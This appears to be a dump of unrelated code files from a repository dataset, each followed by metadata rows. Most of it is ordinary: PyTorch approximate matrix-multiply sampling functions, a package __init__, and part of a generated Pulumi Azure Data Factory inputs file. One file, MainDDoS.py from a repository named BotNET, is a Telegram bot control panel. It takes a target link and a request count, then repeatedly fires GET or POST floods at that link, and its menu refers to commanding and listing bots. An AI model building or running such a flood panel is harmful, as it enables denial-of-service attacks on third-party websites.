additional dimensions
- Weight: :math:`(out\_features, in\_features)`
- Bias: :math:`(out\_features)`
- Output: :math:`(N, *, out\_features)`
"""
#return torch.nn.functional.linear(input,weight,bias)
return approx_linear_forward_xA_b(input,weight.t(),bias,sample_ratio, minimal_k,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu)
def approx_linear_forward_xA_b(input,weight,bias,sample_ratio,minimal_k,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu):
r"""
Applies approximate linear transformation to the incoming data: :math:`y = xA + b`.
Note: A is assumed not transposed
the matrix multiply xA is approximated
Shape:
- Input: :math:`(N, *, in\_features)` where `*` means any number of
additional dimensions
- Weight: :math:`(in\_features, out\_features)`
- Bias: :math:`(out\_features)`
- Output: :math:`(N, *, out\_features)`
"""
#return linear_top_k(input,weight,bias,sample_ratio, minimal_k,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu)
#return linear_top_k_approx(input,weight,bias,sample_ratio, minimal_k,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu)
#return linear_uniform_sampling(input,weight,bias,sample_ratio, minimal_k)
#return linear_random_sampling(input,weight,bias,sample_ratio, minimal_k, with_replacement=True, optimal_prob=True, scale=True,sample_ratio_bwd=sample_ratio_bwd, minimal_k_bwd=minimal_k_bwd, sample_ratio_wu=sample_ratio_wu, minimal_k_wu=minimal_k_wu)
#return approx_linear_xA_b.topk(input,weight,bias,sample_ratio, minimal_k)
return linear_bernoulli_sampling(input,weight,bias,sample_ratio, minimal_k, scale=True,sample_ratio_bwd=sample_ratio_bwd, minimal_k_bwd=minimal_k_bwd, sample_ratio_wu=sample_ratio_wu, minimal_k_wu=minimal_k_wu)
''' Approximates the matrix multiply A*B+b by sampling the column-row pairs with the largest norm
A - input matrix, shape (N,*,in_features) where '*' means any number of additional dimensions
B - input matrices, shape (in_features, out_features)
bias - bias vector, shape (out_features)
sample_ratio - Ratio of column-row pairs to sample
minimal_k - Minimal number of column-row pairs to keep in the sampling
note: B is not transposed
output: A*B+b, shape (N,*,out_features)
'''
def linear_top_k(A,B,bias,sample_ratio, minimal_k,sample_ratio_bwd=None,minimal_k_bwd=None,sample_ratio_wu=None,minimal_k_wu=None):
#print("Sanity check - top_k is used")
#print("A size: {}".format(A.size()))
#print("B size: {}".format(B.size()))
#print("bias size: {}".format(bias.size()))
#print("sample_ratio: {}".format(sample_ratio))
#print("minimal_k: {}".format(minimal_k))
#print("sample_ratio_bwd: {}".format(sample_ratio_bwd))
#print("minimal_k_bwd: {}".format(minimal_k_bwd))
#print("sample_ratio_wu: {}".format(sample_ratio_wu))
#print("minimal_k_wu: {}".format(minimal_k_wu))
in_features = A.size()[-1]
# calculate the number of column-row pairs to sample for the forward propagation phase
k_candidate = int(float(in_features)*sample_ratio)
# make k at least minimal_k
k = min(max(k_candidate,minimal_k),in_features)
# if because of minimal_k or sample_ratio k equals the number of features, perform full matmul instead of approximating
if k == in_features:
#no need to sample. perform normal matmul
if A.dim() == 2 and bias is not None:
# fused op is marginally faster
C = torch.addmm(bias, A, B)
else:
C = torch.matmul(A, B)
if bias is not None:
C += bias
return C
with torch.no_grad():
# calculate norms of the columns of A and rows of B
if A.dim() == 2:
a_col_norms = torch.norm(A,dim=0)
else:
# since we sample across in_featuers, consider other dimensions as a single dimension for sampling purpuses
a_col_norms = torch.norm(A.view(-1,in_features),dim=0)
b_row_norms = torch.norm(B,dim=1)
# multiply both norms element-wise to and pick the indices of the top K column-row pairs
norm_mult = torch.mul(a_col_norms,b_row_norms)
#top_k_indices = torch.topk(norm_mult,k)[1]
top_k_indices = topk_indices(norm_mult,k)
# pick top-k column-row pairs to form new smaller matrices
A_top_k_cols = torch.index_select(A,dim = -1, index = top_k_indices)
B_top_k_rows = torch.index_select(B,dim = 0, index = top_k_indices)
# multiply smaller matrices
if sample_ratio_bwd is None and sample_ratio_wu is None:
if A.dim() == 2 and bias is not None:
# fused op is marginally faster
C_approx = torch.addmm(bias, A_top_k_cols, B_top_k_rows)
else:
C_approx = torch.matmul(A_top_k_cols, B_top_k_rows)
if bias is not None:
C_approx += bias
else:
# The following code will be used to apply additional sampling in the backward pass but update only the
# sub-tensors sampled in the forward pass.
# For simplicity, we don't optimize for torch.addmm usage in this case
C_approx = matmul_approx_bwd_func.apply(A_top_k_cols, B_top_k_rows,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu)
if bias is not None:
C_approx += bias
return C_approx
''' Approximates the matrix multiply A*B+b by sampling the column-row pairs with the largest norm
the norm is sampled from a subset of the reduction dimension
A - input matrix, shape (N,*,in_features) where '*' means any number of additional dimensions
B - input matrices, shape (in_features, out_features)
bias - bias vector, shape (out_features)
sample_ratio - Ratio of column-row pairs to sample
minimal_k - Minimal number of column-row pairs to keep in the sampling
note: B is not transposed
output: A*B+b, shape (N,*,out_features)
'''
def linear_top_k_approx(A,B,bias,sample_ratio, minimal_k,sample_ratio_bwd=None,minimal_k_bwd=None,sample_ratio_wu=None,minimal_k_wu=None):
#print("Sanity check - top_k_approx is used")
#print("A size: {}".format(A.size()))
#print("B size: {}".format(B.size()))
#print("bias size: {}".format(bias.size()))
#print("sample_ratio: {}".format(sample_ratio))
#print("minimal_k: {}".format(minimal_k))
in_features = A.size()[-1]
# calculate the number of column-row pairs to sample for the forward propagation phase
k_candidate = int(float(in_features)*sample_ratio)
# make k at least minimal_k
k = min(max(k_candidate,minimal_k),in_features)
# if because of minimal_k or sample_ratio k equals the number of features, perform full matmul instead of approximating
if k == in_features:
# no need to sample. perform normal matmul
if A.dim() == 2 and bias is not None:
# fused op is marginally faster
C = torch.addmm(bias, A, B)
else:
C = torch.matmul(A, B)
if bias is not None:
C += bias
return C
# calculate norms of the columns of A and rows of B
# instead of calculating the exact norms, we sample a subset of A rows and B columns
# and calculate the norm over them. This serves two purposes:
# 1. faster estimation of the norm
# 2. introduces some randomness to avoid always sampling the same high-norm features
with torch.no_grad():
if A.dim() == 2:
a_num_rows = A.size()[0]
a_sample_start = torch.randint(a_num_rows-9,size=(1,),dtype=torch.long)
a_col_norms = torch.norm(A[a_sample_start:a_sample_start+10:],dim=0)
else:
# since we sample across in_featuers, consider other dimensions as a single dimension for sampling purpuses
a_num_rows = A.view(-1,in_features).size()[0]
a_sample_start = torch.randint(a_num_rows-9,size=(1,),dtype=torch.long)
a_col_norms = torch.norm(A.view(-1,in_features)[a_sample_start:a_sample_start+10,:],dim=0)
b_num_cols = B.size()[1]
b_sample_start = torch.randint(b_num_cols-9,size=(1,),dtype=torch.long)
b_row_norms = torch.norm(B[:,b_sample_start:b_sample_start+10],dim=1)
# multiply both norms element-wise to and pick the indices of the top K column-row pairs
norm_mult = torch.mul(a_col_norms,b_row_norms)
#top_k_indices = torch.topk(norm_mult,k)[1]
top_k_indices = topk_indices(norm_mult,k)
# pick top-k column-row pairs to form new smaller matrices
A_top_k_cols = torch.index_select(A,dim = -1, index = top_k_indices)
B_top_k_rows = torch.index_select(B,dim = 0, index = top_k_indices)
# multiply smaller matrices
if sample_ratio_bwd is None and sample_ratio_wu is None:
if A.dim() == 2 and bias is not None:
# fused op is marginally faster
C_approx = torch.addmm(bias, A_top_k_cols, B_top_k_rows)
else:
C_approx = torch.matmul(A_top_k_cols, B_top_k_rows)
if bias is not None:
C_approx += bias
else:
# The following code will be used to apply additional sampling in the backward pass but update only the
# sub-tensors sampled in the forward pass.
# For simplicity, we don't optimize for torch.addmm usage in this case
C_approx = matmul_approx_bwd_func.apply(A_top_k_cols, B_top_k_rows,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu)
if bias is not None:
C_approx += bias
return C_approx
''' Approximates the matrix multiply A*B+b
A - input matrix, shape (N,*,in_features) where '*' means any number of additional dimensions
B - input matrices, shape (in_features, out_features)
bias - bias vector, shape (out_features)
sample_ratio - Ratio of column-row pairs to sample
minimal_k - Minimal number of column-row pairs to keep in the sampling
with_replacement - True means sampling is done with replacement, False means sampling without replacement
optimal_prob - True means sampling probability is proportional to |Ai|*|Bj|. False means uniform distribution.
scale - True means each column-row is scaled by 1/sqrt(K*pi) to ensure bias 0
'''
def linear_random_sampling(A,B,bias,sample_ratio, minimal_k, with_replacement, optimal_prob, scale,sample_ratio_bwd=None,minimal_k_bwd=None,sample_ratio_wu=None,minimal_k_wu=None):
#print("Sanity check - linear_sampling is used")
#print("A size: {}".format(A.size()))
#print("B size: {}".format(B.size()))
#if bias is not None:
# print("bias size: {}".format(bias.size()))
#else:
# print("no bias")
#print("sample_ratio: {}".format(sample_ratio))
#print("minimal_k: {}".format(minimal_k))
#print("with_replacement: {}".format(with_replacement))
#print("optimal_prob: {}".format(optimal_prob))
#print("scale: {}".format(scale))
#print("A mean: {}".format(A.mean()))
#print("A std: {}".format(A.std()))
#print("B mean: {}".format(B.mean()))
#print("B std: {}".format(B.std()))
in_features = A.size()[-1]
device = A.device
# calculate the number of column-row pairs to sample
k_candidate = int(float(in_features)*sample_ratio)
# make k at least minimal_k
k = min(max(k_candidate,minimal_k),in_features)
# if because of minimal_k or sample_ratio k equals the number of features, perform full matmul instead of approximating
if k == in_features:
# no need to sample. perform normal matmul
if A.dim() == 2 and bias is not None:
# fused op is marginally faster
C = torch.addmm(bias, A, B)
else:
C = torch.matmul(A, B)
if bias is not None:
C += bias
return C
if optimal_prob == True:
with torch.no_grad():
# calculate norms of the columns of A and rows of B
if A.dim() == 2:
a_col_norms = torch.norm(A,dim=0)
else:
# since we sample across in_featuers, consider other dimensions as a single dimension for sampling purpuses
a_col_norms = torch.norm(A.view(-1,in_features),dim=0)
b_row_norms = torch.norm(B,dim=1)
# multiply both norms element-wise
norm_mult = torch.mul(a_col_norms,b_row_norms)
# use epsilon-optimal sampling to allow learning random weights and to bound the scaling factor
epsilon = 0.1
if epsilon > 0:
sum_norm_mult = torch.sum(norm_mult)
norm_mult = torch.div(norm_mult, sum_norm_mult)
uniform = torch.ones_like(norm_mult)/in_features
norm_mult = (1-epsilon)*norm_mult + epsilon*uniform
# no need to normalize, it is already done by torch.multinomial
# calculate number of nonzero elements in norm_mult. this serves
# two purposes:
# 1. Possibly reduce number of sampled pairs, as zero elements in norm_mult will not contribute to the result
# 2. Prevents scaling of zero values
nnz = (norm_mult!=0).sum()
if nnz == 0:
#print("zero multiply detected! scenario not optimzied (todo)")
return torch.nn.functional.linear(A, B.t(),bias)
k = min(k,nnz)
indices = torch.multinomial(norm_mult,k,replacement=with_replacement)
# pick k column-row pairs to form new smaller matrices
A_top_k_cols = torch.index_select(A, dim=-1, index=indices)
B_top_k_rows = torch.index_select(B, dim=0, index=indices)
if scale == True:
# when sampling without replacement a more complicated scaling factor is required (see Horvitz and Thompson, 1952)
assert(with_replacement == True)
# scale column-row pairs by 1/(k*p_i) to get unbiased estimation
with torch.no_grad():
sum_norm_mult = torch.sum(norm_mult)
scale_factors = torch.div(sum_norm_mult,torch.mul(norm_mult,k))
scale_matrix = torch.diag(scale_factors[indices])
A_top_k_cols = torch.matmul(A_top_k_cols, scale_matrix)
else:
# uniform sampling
if with_replacement == True:
indices = torch.randint(low=0,high=in_features,size=(k,),device=device)
else:
uniform_dist = torch.ones(in_features,device=device)
indices = torch.multinomial(uniform_dist,k,replacement=False)
# pick k column-row pairs to form new smaller matrices
A_top_k_cols = torch.index_select(A, dim=-1, index=indices)
B_top_k_rows = torch.index_select(B, dim=0, index=indices)
if scale == True:
# scale column-row pairs by 1/(k*p_i) to get unbiased estimation
# in case of uniform distribution, p_i = 1/in_features when sampling with replacement
# when sampling without replacement a different scaling factor is required (see Horvitz and Thompson, 1952), but
# for uniform sampling it turns to be in_features/k as well
scale_factor = in_features/k
scale_matrix = torch.diag(torch.empty((k,), device=device).fill_(scale_factor))
A_top_k_cols = torch.matmul(A_top_k_cols, scale_matrix)
# multiply smaller matrices
if sample_ratio_bwd is None and sample_ratio_wu is None:
if A.dim() == 2 and bias is not None:
# fused op is marginally faster
C_approx = torch.addmm(bias, A_top_k_cols, B_top_k_rows)
else:
C_approx = torch.matmul(A_top_k_cols, B_top_k_rows)
if bias is not None:
C_approx += bias
else:
# The following code will be used to apply additional sampling in the backward pass but update only the
# sub-tensors sampled in the forward pass.
# For simplicity, we don't optimize for torch.addmm usage in this case
C_approx = matmul_approx_bwd_func.apply(A_top_k_cols, B_top_k_rows,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu)
if bias is not None:
C_approx += bias
return C_approx
def linear_uniform_sampling(A,B,bias,sample_ratio, minimal_k):
#print("Sanity check - uniform_sampling is used")
# calculate the number of column-row pairs to sample for the forward propagation phase
k_candidate = int(float(B.size()[1])*sample_ratio)
# make k at least min_clrows (similar to meProp)
k = min(max(k_candidate,minimal_k),B.size()[1])
indices = torch.randperm(B.size()[1])[:k].cuda()
# pick top-k column-row pairs to form new smaller matrices
A_top_k_cols = torch.index_select(A, dim=1, index=indices)
B_top_k_rows = torch.index_select(B, dim=1, index=indices)
# multiply smaller matrices
C_approx = torch.nn.functional.linear(A_top_k_cols, B_top_k_rows,bias)
return C_approx
''' Approximates the matrix multiply A*B+b using Bernoulli sampling
A - input matrix, shape (N,*,in_features) where '*' means any number of additional dimensions
B - input matrices, shape (in_features, out_features)
bias - bias vector, shape (out_features)
sample_ratio - Ratio of column-row pairs to sample
minimal_k - Minimal number of column-row pairs to keep in the sampling
scale - True means each column-row is scaled by 1/sqrt(K*pi) to ensure bias 0
'''
def linear_bernoulli_sampling(A,B,bias,sample_ratio, minimal_k, scale,sample_ratio_bwd=None,minimal_k_bwd=None,sample_ratio_wu=None,minimal_k_wu=None):
#print("Sanity check - bernoulli_sampling is used")
#print("A size: {}".format(A.size()))
#print("B size: {}".format(B.size()))
#if bias is not None:
# print("bias size: {}".format(bias.size()))
#else:
# print("no bias")
#print("sample_ratio: {}".format(sample_ratio))
#print("minimal_k: {}".format(minimal_k))
#print("scale: {}".format(scale))
#print("A mean: {}".format(A.mean()))
#print("A std: {}".format(A.std()))
#print("B mean: {}".format(B.mean()))
#print("B std: {}".format(B.std()))
in_features = A.size()[-1]
device = A.device
# calculate the number of column-row pairs to sample
k_candidate = int(float(in_features)*sample_ratio)
# make k at least minimal_k
k = min(max(k_candidate,minimal_k),in_features)
# if because of minimal_k or sample_ratio k equals the number of features, perform full matmul instead of approximating
if k == in_features:
# no need to sample. perform normal matmul
if A.dim() == 2 and bias is not None:
# fused op is marginally faster
C = torch.addmm(bias, A, B)
else:
C = torch.matmul(A, B)
if bias is not None:
C += bias
return C
with torch.no_grad():
# calculate norms of the columns of A and rows of B
if A.dim() == 2:
a_col_norms = torch.norm(A,dim=0)
else:
# since we sample across in_featuers, consider other dimensions as a single dimension for sampling purpuses
a_col_norms = torch.norm(A.view(-1,in_features),dim=0)
b_row_norms = torch.norm(B,dim=1)
# multiply both norms element-wise
norm_mult = torch.mul(a_col_norms,b_row_norms)
sum_norm_mult = norm_mult.sum()
# calculate number of nonzero elements in norm_mult. this serves
# two purposes:
# 1. Possibly reduce number of sampled pairs, as zero elements in norm_mult will not contribute to the result
# 2. Prevents scaling of zero values
nnz = (norm_mult!=0).sum()
if nnz == 0:
#print("zero multiply detected! scenario not optimzied (todo)")
return torch.nn.functional.linear(A, B.t(),bias)
k = min(k,nnz)
prob_dist = k * torch.div(norm_mult,sum_norm_mult)
prob_dist = prob_dist.clamp(min=0, max=1)
# use epsilon-optimal sampling to allow learning random weights and to bound the scaling factor
epsilon = 0.1
if epsilon > 0:
uniform = torch.ones_like(prob_dist)/in_features
prob_dist = (1-epsilon)*prob_dist + epsilon*uniform
indices = torch.bernoulli(prob_dist).nonzero(as_tuple=True)[0]
if len(indices) == 0:
print("no elements selected - hmm")
indices = torch.arange(k, device=device)
# sample column-row pairs to form new smaller matrices
A_top_k_cols = torch.index_select(A, dim=-1, index=indices)
B_top_k_rows = torch.index_select(B, dim=0, index=indices)
if scale == True:
# scale column-row pairs by 1/(p_i) to get unbiased estimation
with torch.no_grad():
scale_factors = torch.div(1,prob_dist)
scale_matrix = torch.diag(scale_factors[indices])
A_top_k_cols = torch.matmul(A_top_k_cols, scale_matrix)
# multiply smaller matrices
if sample_ratio_bwd is None and sample_ratio_wu is None:
if A.dim() == 2 and bias is not None:
# fused op is marginally faster
C_approx = torch.addmm(bias, A_top_k_cols, B_top_k_rows)
else:
C_approx = torch.matmul(A_top_k_cols, B_top_k_rows)
if bias is not None:
C_approx += bias
else:
# The following code will be used to apply additional sampling in the backward pass but update only the
# sub-tensors sampled in the forward pass.
# For simplicity, we don't optimize for torch.addmm usage in this case
C_approx = matmul_approx_bwd_func.apply(A_top_k_cols, B_top_k_rows,sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu)
if bias is not None:
C_approx += bias
return C_approx
# This function calculates exact matmul in the forward pass and approximate one in the backward pass
# it is indended to allow approximation of the sampled matrix multiply in approx_linear_func backward pass
# while updating all the matrix elements and not only the elements that were sampled in the forward pass
class matmul_approx_bwd_func(torch.autograd.Function):
@staticmethod
def forward(ctx, inputs, weights, sample_ratio_bwd,minimal_k_bwd,sample_ratio_wu,minimal_k_wu):
ctx.save_for_backward(inputs,weights)
#store non-tensor objects in ctx
ctx.sample_ratio_bwd = sample_ratio_bwd
ctx.minimal_k_bwd = minimal_k_bwd
ctx.sample_ratio_wu = sample_ratio_wu
ctx.minimal_k_wu = minimal_k_wu
return torch.matmul(inputs, weights)
@staticmethod
def backward(ctx, grad_output):
inputs, weights = ctx.saved_tensors
#print('calculating matmul_approx_bwd_func bwd pass! sample_ratio_bwd={},minimal_k_bwd={},sample_ratio_wu={},minimal_k_wu={}'.format(ctx.sample_ratio_bwd,ctx.minimal_k_bwd,ctx.sample_ratio_wu,ctx.minimal_k_wu))
#grad_input = torch.matmul(grad_output, weights.t())
grad_input = approx_linear_forward_xA_b(grad_output, weights.t(), None, ctx.sample_ratio_bwd, ctx.minimal_k_bwd,None,None,None,None)
#grad_weight = torch.matmul(inputs.t(),grad_output)
grad_weight = approx_linear_forward_xA_b(inputs.t(), grad_output, None, ctx.sample_ratio_wu, ctx.minimal_k_wu, None, None, None, None)
return grad_input, grad_weight, None, None, None, None
| 47.083495 | 254 | 0.663106 | 3,662 | 24,248 | 4.175314 | 0.08083 | 0.066906 | 0.026553 | 0.014716 | 0.808829 | 0.79032 | 0.78535 | 0.764356 | 0.742838 | 0.72688 | 0 | 0.005711 | 0.241793 | 24,248 | 514 | 255 | 47.175097 | 0.825945 | 0.380155 | 0 | 0.723214 | 0 | 0 | 0.002075 | 0 | 0 | 0 | 0 | 0.003891 | 0.004464 | 1 | 0.040179 | false | 0 | 0.008929 | 0 | 0.120536 | 0.004464 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
720bc31bafdc3b7643a912bd39bdc9f7d7e8062a | 227 | py | Python | samepy/utils/__init__.py | Ganariya/acopy | 339a35313a5c871d98d8f4444df7661600c6ff00 | [
"Apache-2.0"
] | 59 | 2018-09-06T23:52:56.000Z | 2022-03-31T09:35:22.000Z | samepy/utils/__init__.py | Ganariya/acopy | 339a35313a5c871d98d8f4444df7661600c6ff00 | [
"Apache-2.0"
] | 11 | 2018-11-22T16:06:20.000Z | 2021-11-15T17:47:39.000Z | samepy/utils/__init__.py | Ganariya/acopy | 339a35313a5c871d98d8f4444df7661600c6ff00 | [
"Apache-2.0"
] | 16 | 2018-08-23T12:15:45.000Z | 2022-02-24T04:56:17.000Z | # -*- coding: utf-8 -*-
from . import data # noqa: F401
from . import plot # noqa: F401
from .general import looper # noqa: F401
from .general import is_plot_enabled # noqa: F401
from .general import positive # noqa: F401
| 32.428571 | 50 | 0.696035 | 33 | 227 | 4.727273 | 0.424242 | 0.25641 | 0.307692 | 0.365385 | 0.480769 | 0 | 0 | 0 | 0 | 0 | 0 | 0.087912 | 0.198238 | 227 | 6 | 51 | 37.833333 | 0.769231 | 0.334802 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9d5514705782b1d3b0ba23f868218f731979ea76 | 4,720 | py | Python | BotNET/MainDDoS.py | Reedus0/BotNET | f831abeb291331bff502a58393490b3551eb47c5 | [
"MIT"
] | 7 | 2020-08-10T18:52:21.000Z | 2020-12-09T14:59:45.000Z | BotNET/MainDDoS.py | Reedus0/BotNET | f831abeb291331bff502a58393490b3551eb47c5 | [
"MIT"
] | 1 | 2020-08-17T12:00:47.000Z | 2020-08-17T12:00:47.000Z | BotNET/MainDDoS.py | Reedus0/BotNET | f831abeb291331bff502a58393490b3551eb47c5 | [
"MIT"
] | 2 | 2020-08-17T11:56:01.000Z | 2020-11-06T13:40:04.000Z | import telebot
import config
from dbworker import set_state, get_current_state
from POSTGET import postDDoS, getDDoS
client = telebot.TeleBot(config.config["token"])
link = []
data = []
def mainDDoS(message):
if(message.text == "Exit"):
client.send_message(message.chat.id, 'Logged in - ')
client.send_message(message.chat.id, "Commands: ")
client.send_message(message.chat.id, 'DDOS - enter in DDoS panel')
client.send_message(message.chat.id, 'Check - check new bots')
client.send_message(message.chat.id, 'Bot name + cmd - command line')
client.send_message(message.chat.id, 'online - bots online')
set_state(message.chat.id, config.States.S_LOGINED_A)
elif(message.text == "GET"):
client.send_message(message.chat.id, 'Enter link. To exit type "Exit" ')
set_state(message.chat.id, config.States.S_DDOS_GET1_A)
elif (message.text == "POST"):
client.send_message(message.chat.id, 'Enter link. To exit type "Exit" ')
set_state(message.chat.id, config.States.S_DDOS_POST1_A)
@client.message_handler(func=lambda message: get_current_state(message.chat.id) == config.States.S_DDOS_GET1_A)
def GETDDOS1(message):
if(message.text != "Exit"):
link.append(message.text)
client.send_message(message.chat.id, 'Enter count of operations. To exit type "Exit" ')
set_state(message.chat.id, config.States.S_DDOS_GET2_A)
else:
client.send_message(message.chat.id, 'Choose type of DDoS:')
client.send_message(message.chat.id, 'GET')
client.send_message(message.chat.id, 'POST')
client.send_message(message.chat.id, 'To exit type "Exit"')
set_state(message.chat.id, config.States.S_DDOS_A)
@client.message_handler(func=lambda message: get_current_state(message.chat.id) == config.States.S_DDOS_GET2_A)
def GETDDOS2(message):
if(message.text != "Exit"):
client.send_message(message.chat.id, 'DDoS is had begun')
operations = int(message.text)
for i in range(operations):
getDDoS(link[0])
client.send_message(message.chat.id, 'DDoS is end, you was redirected to main menu')
set_state(message.chat.id, config.States.S_LOGINED_A)
else:
client.send_message(message.chat.id, 'Choose type of DDoS:')
client.send_message(message.chat.id, 'GET')
client.send_message(message.chat.id, 'POST')
client.send_message(message.chat.id, 'To exit type "Exit"')
set_state(message.chat.id, config.States.S_DDOS_A)
@client.message_handler(func=lambda message: get_current_state(message.chat.id) == config.States.S_DDOS_POST1_A)
def POSTDDOS1(message):
if(message.text != "Exit"):
link.append(message.text)
client.send_message(message.chat.id, 'Enter data of POST request. To exit type "Exit" ')
set_state(message.chat.id, config.States.S_DDOS_POST2_A)
else:
client.send_message(message.chat.id, 'Choose type of DDoS:')
client.send_message(message.chat.id, 'GET')
client.send_message(message.chat.id, 'POST')
client.send_message(message.chat.id, 'To exit type "Exit"')
set_state(message.chat.id, config.States.S_DDOS_A)
@client.message_handler(func=lambda message: get_current_state(message.chat.id) == config.States.S_DDOS_POST2_A)
def POSTDDOS2(message):
if(message.text != "Exit"):
data.append(message.text)
client.send_message(message.chat.id, 'Enter count of operations. To exit type "Exit" ')
set_state(message.chat.id, config.States.S_DDOS_POST3_A)
else:
client.send_message(message.chat.id, 'Choose type of DDoS:')
client.send_message(message.chat.id, 'GET')
client.send_message(message.chat.id, 'POST')
client.send_message(message.chat.id, 'To exit type "Exit"')
set_state(message.chat.id, config.States.S_DDOS_A)
@client.message_handler(func=lambda message: get_current_state(message.chat.id) == config.States.S_DDOS_POST3_A)
def POSTDDOS3(message):
if(message.text != "Exit"):
client.send_message(message.chat.id, 'DDoS had begun')
operations = int(message.text)
for i in range(operations):
postDDoS(link[0], data[0])
client.send_message(message.chat.id, 'DDoS is end, you was redirected to main menu')
set_state(message.chat.id, config.States.S_LOGINED_A)
else:
client.send_message(message.chat.id, 'Choose type of DDoS:')
client.send_message(message.chat.id, 'GET')
client.send_message(message.chat.id, 'POST')
client.send_message(message.chat.id, 'To exit type "Exit"')
set_state(message.chat.id, config.States.S_DDOS_A) | 49.166667 | 112 | 0.690678 | 685 | 4,720 | 4.59562 | 0.119708 | 0.185197 | 0.218869 | 0.266836 | 0.880241 | 0.872618 | 0.834498 | 0.821474 | 0.820839 | 0.820839 | 0 | 0.004638 | 0.177754 | 4,720 | 96 | 113 | 49.166667 | 0.806493 | 0 | 0 | 0.568182 | 0 | 0 | 0.150392 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.068182 | false | 0 | 0.045455 | 0 | 0.113636 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
dfa97af6ade78122806c64eaf2c404a191381c8f | 926,324 | py | Python | sdk/python/pulumi_azure_nextgen/datafactory/v20170901preview/_inputs.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_nextgen/datafactory/v20170901preview/_inputs.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_azure_nextgen/datafactory/v20170901preview/_inputs.py | test-wiz-sec/pulumi-azure-nextgen | 20a695af0d020b34b0f1c336e1b69702755174cc | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
__all__ = [
'ActivityDependencyArgs',
'ActivityPolicyArgs',
'AmazonMWSLinkedServiceArgs',
'AmazonMWSObjectDatasetArgs',
'AmazonRedshiftLinkedServiceArgs',
'AmazonS3DatasetArgs',
'AmazonS3LinkedServiceArgs',
'AvroFormatArgs',
'AzureBatchLinkedServiceArgs',
'AzureBlobDatasetArgs',
'AzureDataLakeAnalyticsLinkedServiceArgs',
'AzureDataLakeStoreDatasetArgs',
'AzureDataLakeStoreLinkedServiceArgs',
'AzureDatabricksLinkedServiceArgs',
'AzureKeyVaultLinkedServiceArgs',
'AzureKeyVaultSecretReferenceArgs',
'AzureMLLinkedServiceArgs',
'AzureMySqlLinkedServiceArgs',
'AzureMySqlTableDatasetArgs',
'AzurePostgreSqlLinkedServiceArgs',
'AzurePostgreSqlTableDatasetArgs',
'AzureSearchIndexDatasetArgs',
'AzureSearchLinkedServiceArgs',
'AzureSqlDWLinkedServiceArgs',
'AzureSqlDWTableDatasetArgs',
'AzureSqlDatabaseLinkedServiceArgs',
'AzureSqlTableDatasetArgs',
'AzureStorageLinkedServiceArgs',
'AzureTableDatasetArgs',
'CassandraLinkedServiceArgs',
'CassandraTableDatasetArgs',
'ConcurLinkedServiceArgs',
'ConcurObjectDatasetArgs',
'ControlActivityArgs',
'CosmosDbLinkedServiceArgs',
'CouchbaseLinkedServiceArgs',
'CouchbaseTableDatasetArgs',
'CustomDataSourceLinkedServiceArgs',
'CustomDatasetArgs',
'DatasetBZip2CompressionArgs',
'DatasetDeflateCompressionArgs',
'DatasetGZipCompressionArgs',
'DatasetZipDeflateCompressionArgs',
'Db2LinkedServiceArgs',
'DocumentDbCollectionDatasetArgs',
'DrillLinkedServiceArgs',
'DrillTableDatasetArgs',
'DynamicsEntityDatasetArgs',
'DynamicsLinkedServiceArgs',
'EloquaLinkedServiceArgs',
'EloquaObjectDatasetArgs',
'EntityReferenceArgs',
'ExecutionActivityArgs',
'FactoryIdentityArgs',
'FactoryVSTSConfigurationArgs',
'FileServerLinkedServiceArgs',
'FileShareDatasetArgs',
'FtpServerLinkedServiceArgs',
'GoogleBigQueryLinkedServiceArgs',
'GoogleBigQueryObjectDatasetArgs',
'GreenplumLinkedServiceArgs',
'GreenplumTableDatasetArgs',
'HBaseLinkedServiceArgs',
'HBaseObjectDatasetArgs',
'HDInsightLinkedServiceArgs',
'HDInsightOnDemandLinkedServiceArgs',
'HdfsLinkedServiceArgs',
'HiveLinkedServiceArgs',
'HiveObjectDatasetArgs',
'HttpDatasetArgs',
'HttpLinkedServiceArgs',
'HubspotLinkedServiceArgs',
'HubspotObjectDatasetArgs',
'ImpalaLinkedServiceArgs',
'ImpalaObjectDatasetArgs',
'IntegrationRuntimeComputePropertiesArgs',
'IntegrationRuntimeCustomSetupScriptPropertiesArgs',
'IntegrationRuntimeDataProxyPropertiesArgs',
'IntegrationRuntimeReferenceArgs',
'IntegrationRuntimeSsisCatalogInfoArgs',
